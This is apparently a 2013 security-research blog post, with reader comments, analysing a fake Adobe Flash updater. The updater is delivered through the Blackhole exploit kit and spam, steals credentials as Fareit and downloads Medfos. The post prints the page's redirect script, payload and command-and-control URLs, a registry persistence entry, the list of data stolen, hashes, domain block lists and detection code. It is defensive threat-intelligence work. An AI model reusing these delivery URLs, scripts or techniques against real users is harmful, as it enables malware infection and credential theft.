Thursday, March 7, 2013

Fake Adobe Flash Updater in 173.246.102.2 - Win32/Fareit downloads Win32/Medfos (to then download OTHER malware at Megaupload.com)

This story started from an exploit kit (EK) landing page at:
"h00p://17.247nycr.com/news/breaks-harmless.php"
on the IP 173.246.102.2, which has the following network registration:
NetRange:       173.246.96.0 - 173.246.111.255
CIDR:           173.246.96.0/20
OriginAS:       AS29169
NetName:        GANDI-NET-DC1-1
NetHandle:      NET-173-246-96-0-1
Parent:         NET-173-0-0-0-0
NetType:        Direct Allocation
Comment:        http://www.gandi.net/
RegDate:        2010-06-18
Updated:        2012-02-24
Ref:            http://whois.arin.net/rest/net/NET-173-246-96-0-1
OrgName:        Gandi US Inc.
OrgId:          GANDI-2
Address:        Gandi US Inc.
Address:        PO Box 32863
City:           Baltimore
StateProv:      MD
PostalCode:     21282
Country:        US
RegDate:        2010-05-20
Updated:        2010-06-24
Comment:        Gandi is an ICANN accredited registrar and VPS/Cloud hosting provider with operations in France, UK, and the United States.
Comment:        http://www.gandi.net/
Ref:            http://whois.arin.net/rest/org/GANDI-2
It has new, updated infections in the URLs listed here-->>[UrlQuery], served from the IPs below:
174.140.167.197
173.246.102.250
173.255.215.242 "(killed)"
173.246.102.2
50.116.11.176
184.154.70.115
[GeoIP result screenshot omitted.] I checked the IP further and found a Blackhole Exploit Kit; the server response headers were:
Server: nginx/0.7.67
Date: Thu, 07 Mar 2013 11:19:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14-1~dotdeb.0
For reference, the infector URL report is here-->>[urlquery.net], and a long list of historical reports for the same IP is here-->>[urlquery.net].
The Blackhole exploit kit configuration itself is better tuned than usual: repeated requests, or requests with bad parameters, get you a 502 or 404. In short, if you set everything right as per our guide-->>[here], you'll get the usual BHEK payload download URL, as below:
"h00p://17.247nycr.com/news/breaks-harmless.php?df=1m:1o:1g:1g:31&xe=1n:1m:1o:1g:1o:33:33:1k:31:1o&y=1f&fl=c&eh=q&jopa=6435338"
..and the downloaded payload is as shown in the URLQuery snapshot here-->http://urlquery.net/report.php?id=1268751
The details of decoding the BHEK payload were covered many times in our previous posts, so forgive me for not discussing them here.. I'll go straight to the next "important" part..

I received a separate report from "a friend" about an active TDS endpoint, and another separate report of a spam destination, both pointing to the same infector server BUT with a different domain name, as per the URL below:

"h00p://17.optimax-fuel-saver.us/adobe/"
Yes, both routes have the same destination IP, 173.246.102.2. Overall, this infection is a double-route scheme: TDS/spam redirection combined with Blackhole, both delivering the payload. This is the main point of this post.

The fake Adobe download page looks like below (lame, isn't it?):
[Screenshots: the page as viewed in Internet Explorer and in Mozilla Firefox (sorry for the Japanese-language browsers I used..)]

It carries a redirect script, as per below:

// Evil script at line 139 of the page source:
  :
<script language = 'javascript'>
  var delay = 3000;
  // after 3 seconds, send the browser to the EXE in the same directory as the page
  setTimeout("document.location.href='update_flash_player.exe'", delay);
</script>
If you follow this.. you'll get the payload URL, a fake Flash Player updater:
--2013-03-07 15:58:47--  
"h00p://17.optimax-fuel-saver.us/adobe/update_flash_player.exe"
Resolving 17.optimax-fuel-saver.us... seconds 0.00, "173.246.102.2"
Caching 17.optimax-fuel-saver.us => "173.246.102.2"
Connecting to 17."optimax-fuel-saver.us"|"173.246.102.2|:80"... seconds 0.00, connected.
"GET /adobe/update_flash_player.exe HTTP/1.0
Referer: h00p://17.247nycr.com/news/breaks-harmless.php
Host: 17.optimax-fuel-saver.us"
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 07 Mar 2013 06:57:52 GMT
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 136704
Last-Modified: Thu, 07 Mar 2013 06:55:01 GMT
Accept-Ranges: bytes
200 OK
Registered socket 1896 for persistent reuse.
Length: 136704 (134K) [application/octet-stream]
Saving to: `update_flash_player.exe'
2013-03-07 15:58:52 (44.6 KB/s) - `update_flash_player.exe' saved [136704/136704]

You can safely view the snapshot of this payload here-->>[URLQuery]

"What is it with this payload? Why is the double-route infection scheme necessary?" These questions are answered by studying the payloads, as follows:

Payload: Fake Adobe Flash Updater

The bad guys are exploiting the Adobe Flash update season to release this fake updater together with the lame imitation Adobe page. The payload binary looks like below:

// File Information:
Sections (name, virtual address, virtual size, raw size):
   .text 0x1000 0x13b0 5120
   .rdata 0x3000 0xc0c 3584
   .data 0x4000 0xa0a 3072
   .rsrc 0x5000 0x1e2ac 123904

File Size : 136 KB
Entry Point: 0x1174
Compile Time: 2013-01-24 03:07:22 (local time)
              0x510026DA [Wed Jan 23 18:07:22 2013 UTC]
CRC Fail. Claimed:  0, Actual:  201663

//Anti-reverse:
0x401174 mov eax esi 
0x401176 add esi 0x403110 
0x401178 sub esi 0x6d 
0x40117e mov esi [si-0x1] 
0x401181 push 0x55 
0x401184 shl esi 0xc 
0x401186 pop ecx 
0x401189 shl esi 0x4 
0x40118a add eax esi 
0x40118d add eax 0x8f 
0x40118f mov edx [eax+ecx2+0x2] 
0x401192 shr edx 0x8 
0x401196 add esi edx 
0x401199 mov ecx [si+0x1d] 
0x40119b sub cl 0x0 
0x40119e jz 0x4011c6L 
0x4011a1 mov dl 0x1c 
0x4011a3 cmp cl dl 
0x4011a5 jb 0x4011bdL 
0x4011a7 mov dl 0xc0 
0x4011a9 cmp cl dl 
0x4011ab nop 
0x4011ad ja 0x4011bdL 
0x4011ae mov r15d 0x404000 
0x4011b0 xor eax eax 
0x4011b5 jz 0x4010d0L 
0x4011b7 xor eax eax 
0x4011bd mov [fs:ax] esp 
0x4011bf nop 
0x4011c2 pushad 
0x4011c3 jmp near 0x4011bdL 
0x4011c4 xor eax eax 
0x4011bd mov [fs:ax] esp 
0x4011bf nop 
   :      : //loops..
The binary itself is encoded with a packer, which uses anti-reverse loops to keep us from recovering the import data. This suggests it wasn't the work of automation. Packer information:
"aPLib v1.01"  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
More information: "http://www.ibsensoftware.com/"
Hex of the first block:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 FF 00 00 00 7C 00 00 00    ............|...
0040   BC 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90    ........!..L.!..
0050   54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73    This program mus
0060   74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57    t be run under W
0070   69 6E 33 32 0D 0A 24 37 00 00 00 00 50 45 00 00    in32..$7....PE..
0080   4C 01 04 00 DA 26 00 51 00 00 00 00 00 00 00 00    L....&.Q........
0090   E0 00 0F 01 0B 01 0C 00 00 14 00 00 00 FE 01 00    ................
00A0   00 00 00 00 74 11 00 00 00 10 00 00 00 30 00 00    ....t........0..
00B0   00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00    ..@.............
00C0   00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00    .............@..
00D0   00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00    .................
 :                            :                                :
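The file information above (the compile time read from TimeDateStamp 0x510026DA, visible as DA 26 00 51 at offset 0x84 of the dump, and the "CRC Fail") comes down to a few header fields. The Python below is an added example, not the post's own tooling: it decodes the timestamp, recomputes the PE checksum with the imagehlp algorithm so a zeroed CheckSum is flagged, and lists the section table. It runs on a constructed minimal PE32 header carrying the write-up's values, not on the real sample.

```python
import struct
from datetime import datetime, timezone

def pe_checksum(data, checksum_offset):
    """PE checksum as imagehlp's CheckSumMappedFile computes it: one's-complement sum
    of 16-bit words (end-around carry), skipping the CheckSum field, plus file length."""
    length = len(data)
    if length % 2:
        data += b"\0"
    total = 0
    for off in range(0, len(data), 2):
        if off in (checksum_offset, checksum_offset + 2):
            continue
        total += int.from_bytes(data[off:off + 2], "little")
        total = (total >> 16) + (total & 0xFFFF)
    return (((total >> 16) + total) & 0xFFFF) + length

def triage_pe(data):
    """Header facts the write-up leans on: compile timestamp, claimed vs. actual
    checksum, entry point and section table (PE32 only)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]               # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    _, nsect, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]        # AddressOfEntryPoint
    claimed = struct.unpack_from("<I", data, opt + 64)[0]      # CheckSum
    sections = []
    for i in range(nsect):
        name, vsize, va, raw = struct.unpack_from("<8sIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, vsize, raw))
    return {
        "compile_time": datetime.fromtimestamp(stamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "entry_point": entry,
        "checksum_claimed": claimed,
        "checksum_actual": pe_checksum(data, opt + 64),
        "sections": sections,
    }

def build_sample_header():
    """Constructed minimal PE32 header (NOT the real sample) carrying the values
    from the write-up: TimeDateStamp 0x510026DA, entry 0x1174, CheckSum 0."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0x510026DA, 0, 0, 224, 0x102)
    opt = bytearray(224)                                        # CheckSum stays 0, as in the sample
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1174)                     # AddressOfEntryPoint
    sect = struct.pack("<8sIIII", b".text", 0x13B0, 0x1000, 5120, 0x200) + b"\0" * 16
    return dos + coff + bytes(opt) + sect

if __name__ == "__main__":
    r = triage_pe(build_sample_header())
    print(r["compile_time"], hex(r["entry_point"]), r["sections"])
    print("CRC", "OK" if r["checksum_claimed"] == r["checksum_actual"] else
          f"Fail. Claimed: {r['checksum_claimed']}, Actual: {r['checksum_actual']}")
```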
[Screenshot of the binary's icon and properties omitted.] Well, it looks convincing... except, if you run it, you'll see the "different" works described below. The overall summary of this infection:
1. The malware connects to these remote hosts:
"h00p://64.13.172.42:8080/forum/viewtopic.php
h00p://20.anythinginternational.biz/forum/viewtopic.php
h00p://20.anythinginternational.com/forum/viewtopic.php
h00p://20.chelsiamd.com/forum/viewtopic.php
"
2. It sends an HTTP/1.1 POST to them [screenshot omitted].
3. It then requests the download of OTHER malware from:
"h00p://kfz-youngtimerservice.de/P81.exe
h00p://mtmedia.net/tJr4H.exe
h00p://cinemacityhu.iq.pl/iN5Vf.exe
"
PoC: [screenshots omitted]
4. The downloaded file was saved in %Temp%.
5. With a little help from an evil BAT file, the payload was saved in %AppData% as a randomly named DLL.
6. The DLL saved in %AppData% was executed via RUNDLL32.EXE, and after running it made changes in the registry:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\uping: 
  "rundll32.exe "C:\Documents and Settings\rik\Application Data\uping.dll",AAuxClose"
7. It executed iexplore.exe with the "-Embedding" option.
8. Then, via iexplore.exe, it started the next series of malware downloads from megaupload.com.
9. It also sent some malformed UDP/137 requests.
What is the purpose of the POST request? Yes friends, it is to steal credentials. The information below is targeted by this malware:
My Documents
AppData
Local AppData
Cache
Cookies
History
My Documents
Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
   :
PLUS credentials of MORE software, per this list-->>[PASTEBIN]

How bad is this malicious stuff?

The above data leads to the conclusion that the Fake Flash Updater is a variant of the password stealer Trojan PWS Win32/Fareit (this verdict is based on the list of data it grabs, the particular packer and binary encryption used, and the HTTP/1.0 header it sends); see the definition here too-->>[Microsoft]. The first downloaded binary, a "fake" DLL, is a variant of Trojan Downloader Win32/Medfos, a downloader that fetches other malware planted on various free-download sites (in our case megaupload.com); reference here-->>[Microsoft]

What's the purpose of this IP's infections, then?

The purpose is to grab as many victims' credentials as possible, using the fake software updater as the front-end infection. Just like the URLs we saw, many other fake updaters are served from other IPs too, and they all use the typical bogus URL form http://[2-digit number].[fakebrowser-bogus-strings].com/[adobe|chrome|other updater possibilities]/, which suggests the same cybercrime group is behind them; for example, as found on IP 173.255.215.242 by our friend @hugbomb here:

[Screenshot: Fake Adobe Flash Player Update for Chrome]

[Screenshot: Fake Google Chrome Update]

The currently active domains pointing to the IPs used by this criminal group, 173.255.215.242 and 173.246.102.2, are strongly suggested to be blocked.

PS: Please use the complete list made by Mr. Conrad Longmore here-->>[Dynamoo Blog]
Note that the domains change frequently; to nail this scheme properly you will need to understand how they use domain registration, as per the details below:
// lookup optimax-fuel-saver.us
17.optimax-fuel-saver.us internet address = 173.246.102.2
optimax-fuel-saver.us   nameserver = "ns07.domaincontrol.com"
optimax-fuel-saver.us   nameserver = "ns08.domaincontrol.com"
optimax-fuel-saver.us
        primary name server = ns07.domaincontrol.com
        responsible mail addr = dns.jomax.net
        serial  = 2013030500
        refresh = 28800 (8 hours)
        retry   = 7200 (2 hours)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)
//whois
Domain Name:                                 OPTIMAX-FUEL-SAVER.US
Domain ID:                                   D36373111-US
Sponsoring Registrar:                        "GODADDY.COM, INC."
Sponsoring Registrar IANA ID:                146
Registrant ID:                               CR115585728
Created by Registrar:                        GODADDY.COM, INC.
Last Updated by Registrar:                   GODADDY.COM, INC.
Domain Registration Date:                    Sun Jun 10 01:03:54 GMT 2012
Domain Expiration Date:                      Sun Jun 09 23:59:59 GMT 2013
Domain Last Updated Date:                    Sun Jun 10 01:03:55 GMT 2012

// lookup phccpro.com
20.phccpro.com  internet address = 173.255.215.242
phccpro.com     nameserver = "ns37.domaincontrol.com"
phccpro.com     nameserver = "ns38.domaincontrol.com"
        primary name server = "ns37.domaincontrol.com"
        responsible mail addr = dns.jomax.net
        serial  = 2013030600
        refresh = 28800 (8 hours)
        retry   = 7200 (2 hours)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)

//whois it?
  Domain Name: PHCCPRO.COM
   Registrar: "GODADDY.COM, LLC"
   Whois Server: whois.godaddy.com
   Referral URL: http://registrar.godaddy.com
   Name Server: NS37.DOMAINCONTROL.COM
   Name Server: NS38.DOMAINCONTROL.COM
   Status: clientDeleteProhibited
   Status: clientRenewProhibited
   Status: clientTransferProhibited
   Status: clientUpdateProhibited
   Updated Date: 15-apr-2011
   Creation Date: 20-jun-2009
   Expiration Date: 20-jun-2013

//lookup 17.setapartcreative.com
17.setapartcreative.com internet address = 173.246.102.2
setapartcreative.com    nameserver = ns07.domaincontrol.com
setapartcreative.com    nameserver = ns08.domaincontrol.com
setapartcreative.com
        primary name server = ns07.domaincontrol.com
        responsible mail addr = dns.jomax.net
        serial  = 2013030400
        refresh = 28800 (8 hours)
        retry   = 7200 (2 hours)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)
//whois:
   Domain Name: SETAPARTCREATIVE.COM
   Registrar: "GODADDY.COM, LLC"
   Whois Server: whois.godaddy.com
   Referral URL: http://registrar.godaddy.com
   Name Server: "NS07.DOMAINCONTROL.COM"
   Name Server: "NS08.DOMAINCONTROL.COM"
   Status: clientDeleteProhibited
   Status: clientRenewProhibited
   Status: clientTransferProhibited
   Status: clientUpdateProhibited
   Updated Date: 04-feb-2013
   Creation Date: 03-feb-2009
   Expiration Date: 03-feb-2014

If you see what I see, the malware moronz' group is serving malware domains using a pattern: legitimate domains registered through GoDaddy, with DOMAINCONTROL.COM DNS, that have somehow been hijacked; numeric subdomains are then added through those domains' DNS and used as infectors. Don't ask me how the crime group gained control of these domains; it could be a procedural or a technical leak.. This matter should be strongly noted by GoDaddy (registrar), DomainControl (DNS provider) and, at a higher level, ICANN, so that they are aware of this malicious scheme.
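The two patterns above (a two-digit numeric subdomain bolted onto a legitimate GoDaddy/DomainControl domain, plus either the /adobe/ or /chrome/ updater path ending in update_*.exe or a /news/*.php Blackhole landing) translate directly into a proxy-log check. The Python below is an added example, not code from the post: the log line format is constructed, and the updater directory names beyond adobe and chrome are assumed.

```python
import re
from urllib.parse import urlparse

# Scheme from the write-up: http://<2-digit number>.<hijacked legit domain>/<adobe|chrome|...>/
UPDATER_DIRS = {"adobe", "chrome", "firefox", "java"}    # names beyond adobe/chrome are assumed
NUMERIC_LABEL = re.compile(r"^\d{2}$")
UPDATER_EXE = re.compile(r"^update_[a-z0-9_]+\.exe$", re.I)
BHEK_LANDING = re.compile(r"^[a-z]+(?:[-_][a-z]+)*\.php$", re.I)   # e.g. breaks-harmless.php

def classify_url(url):
    """Return the set of indicators a URL shows. 'numeric-subdomain' on its own is
    not a hit (legit hosts can have numeric labels); it needs a path indicator too."""
    if "://" not in url:
        url = "http://" + url
    p = urlparse(url)
    labels = (p.hostname or "").split(".")
    parts = [s for s in p.path.split("/") if s]
    tags = set()
    if len(labels) >= 3 and NUMERIC_LABEL.match(labels[0]):
        tags.add("numeric-subdomain")
    if parts and parts[0].lower() in UPDATER_DIRS:
        tags.add("updater-dir")
    if parts and UPDATER_EXE.match(parts[-1]):
        tags.add("updater-exe")
    if len(parts) == 2 and parts[0].lower() == "news" and BHEK_LANDING.match(parts[1]):
        tags.add("news-php-landing")
    return tags

def is_fake_updater_hit(tags):
    return "numeric-subdomain" in tags and len(tags) > 1

def scan_proxy_log(lines):
    """Parse constructed proxy log lines '<epoch> <client> <method> <url> <status>'
    and return (client, host, sorted tags) for every hit."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[3]
        tags = classify_url(url)
        if is_fake_updater_hit(tags):
            hits.append((client, urlparse(url).hostname, sorted(tags)))
    return hits

def block_candidates(hits):
    """Distinct hosts to push to the proxy blocklist."""
    return sorted({host for _, host, _ in hits})

# Constructed sample log (not real traffic); the two bad hosts are the ones named in the post.
SAMPLE_LOG = [
    "1362643127.410 192.0.2.10 GET http://17.247nycr.com/news/breaks-harmless.php 200",
    "1362643130.021 192.0.2.10 GET http://17.optimax-fuel-saver.us/adobe/ 200",
    "1362643133.555 192.0.2.10 GET http://17.optimax-fuel-saver.us/adobe/update_flash_player.exe 200",
    "1362643140.000 192.0.2.11 GET http://get.adobe.com/flashplayer/ 200",
    "1362643141.000 192.0.2.12 GET http://10.example.net/files/readme.txt 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
    print("block:", block_candidates(scan_proxy_log(SAMPLE_LOG)))
```

Comment 7 below gives the same idea as a single regex; the tag-based version keeps the reasons for each hit, which is what you want when tuning it against false positives.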

Samples

VirusTotal detection of Trojan Fareit-->>[URL], summary:
SHA1: 1e9769c652e94af4b0accc42da643a1c00021b30
MD5: a1545b09716f6036739daafa003649a1
File size: 133.5 KB ( 136704 bytes )
File name: update_flash_player.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 17 / 46
Analysis date: 2013-03-07 12:07:28 UTC ( 2 hours, 8 minutes ago )

F-Secure                 : Trojan.FakeAlert.DFX
F-Prot                   : W32/SuspPack.EX2.gen!Eldorado
Symantec                 : Suspicious.Cloud
ESET-NOD32               : a variant of Win32/Kryptik.AWDG
MicroWorld-eScan         : Trojan.FakeAlert.DFX
Avast                    : Win32:LockScreen-SL [Trj]
nProtect                 : Trojan.FakeAlert.DFX
CAT-QuickHeal            : (Suspicious) - DNAScan
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Trojan.FakeAlert.DFX
McAfee                   : BackDoor-FJW
Malwarebytes             : Malware.Packer.SGX2
Fortinet                 : W32/Kryptik.KZ!tr
GData                    : Trojan.FakeAlert.DFX
PCTools                  : HeurEngine.ZeroDayThreat
Sophos                   : Troj/Zbot-ECS
Comodo                   : Heur.Packed.Unknown
VirusTotal detection of Trojan Medfos-->>[URL], summary:
SHA1: fbc141e3c155b809298f53336c583697a209e567
MD5: 68db8dfe21ffa72982402fef5ef48c14
File size: 145.0 KB ( 148480 bytes )
File name: int.EXE
File type: Win32 EXE
Tags: peexe
Detection ratio: 13 / 46
Analysis date: 2013-03-07 10:41:05 UTC ( 3 hours, 37 minutes ago )

F-Secure                 : Gen:Variant.Zusy.38855
GData                    : Gen:Variant.Zusy.38855
Norman                   : Medfos.BO
ESET-NOD32               : a variant of Win32/Medfos.LL
MicroWorld-eScan         : Gen:Variant.Zusy.38855
Sophos                   : Mal/Medfos-M
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Gen:Variant.Zusy.38855
Malwarebytes             : Trojan.Medfos
Panda                    : Suspicious file
Fortinet                 : W32/Medfos.KG!tr
PCTools                  : HeurEngine.ZeroDayThreat
Microsoft                : Trojan:Win32/Medfos.A  
The samples, for research purposes, are downloadable here--->>[MEDIAFIRE], and the PCAP data I recorded is here-->>[HERE]. *) Please feel free to contact us on Twitter for more research materials :-)
#MalwareMustDie! The NPO of engineers who care about security | http://www.malwaremustdie.org

7 comments:

  1. Nice, identified some of the bad domains here.

  2. [Additional #1]

    Thanks to Conrad of Dynamoo Blog, he was making a very good block list of the related bad URLs of the host/infector reported in this post (173.246.102.2) in [HERE]

  3. [Additional #2]

    These mal-domains are UP and ALIVE pointed to 173.246.102.2

    17.247nycr.com
    17.ir-c.net
    17.optimax-fuel-saver.us
    17.schnoescpa.com
    17.setapartcreative.com

  4. New Series of Adobe Updater Malware Infection detected in below domains;

    //Infector NEW alive domains...

    21.aribadellago.com
    21.cedrictherealtor.com
    21.az55pluscommunity.com
    21.aribadellago.com

    // IP infectors....SHUT DOWN THIS!
    173.246.102.250 [United States]

    // Network:
    NetRange: 173.246.96.0 - 173.246.111.255
    CIDR: 173.246.96.0/20
    OriginAS: AS29169
    NetName: GANDI-NET-DC1-1
    OrgName: Gandi US Inc.
    OrgId: GANDI-2
    Address: PO Box 32863
    City: Baltimore
    StateProv: MD
    PostalCode: 21282
    Country: US
    RegDate: 2010-05-20
    Updated: 2010-06-24
    Comment: Gandi is an ICANN accredited registrar and VPS/Cloud hosting
    provider with operations in France, UK & United States.
    Comment: http://www.gandi.net/
    Ref: http://whois.arin.net/rest/org/GANDI-2

    // To be blocked:

    h00p://21.az55pluscommunity.com/*
    h00p://21.cedrictherealtor.com/*
    h00p://21.az55pluscommunity.com/*
    h00p://21.aribadellago.com/*

    //Recorded Infector URL

    h00p://21.az55pluscommunity.com/news/tuts_php_hit_counter.php

    h00p://21.cedrictherealtor.com/news/algorithms_creates-sides.php
    h00p://21.cedrictherealtor.com/adobe/update_flash_player.exe
    h00p://21.cedrictherealtor.com/news/tuts_php_hit_counter.php
    h00p://21.cedrictherealtor.com/news/faults-ending.php
    h00p://21.cedrictherealtor.com/news/striking-tendency_members.ph

    h00p://21.az55pluscommunity.com/adobe/
    h00p://21.az55pluscommunity.com/adobe/update_flash_player.exe

    h00p://21.aribadellago.com
    h00p://21.aribadellago.com/adobe/
    h00p://21.aribadellago.com/news/striking-tendency_members.php
    h00p://21.aribadellago.com/news/falls_unit-dump_invariably.php
    h00p://21.aribadellago.com/news/meetings-plans-doubtful.php
    h00p://21.aribadellago.com/adobe/update_flash_player.exe
    ----
    #MalwareMustDie!

  5. // Dangerous & Highly Suspected Domains
    // All are UP & ALIVE
    // Logic Pre-CALC: http://21.*.com/*
    // Worth to check your network relation and to #BLOCK!
    // CSV format: Domains,IP,Verdict

    21.blancoface.com,208.87.35.103, (Suspected: CYCBOT)
    21.data-center-india.com,82.98.86.167, (Suspected: Elenore exploit kit )
    21.devotski.com,69.43.161.166, (Suspected: KoobFace)
    21.idealfly.com,107.20.206.69, (Suspected: TDS SUTRA)
    21.kwihosting.com,69.43.161.159, (Suspected: TDS SUTRA)
    21.movfree.com,204.13.162.116, (Suspected: MALWARE-CNC Sality logos.gif URLs )
    21.roundclip.com,107.20.206.69, (Suspected: ET TROJAN DLoader)
    21.shopband.com,216.8.179.25, (Suspected: Casalemedia Spyware)
    21.shopflip.com,107.20.206.69, (Suspected: TROJAN DLoader)

    ---
    #MalwareMustDie!

  6. 173.255.215.242 #tango was burned down

  7. using rgx: \/[0-9]{2}\.[a-z]{3,}\.[a-z]{2,4}\/[a-z]{3,}\/[a-z]{3,} i.e. here
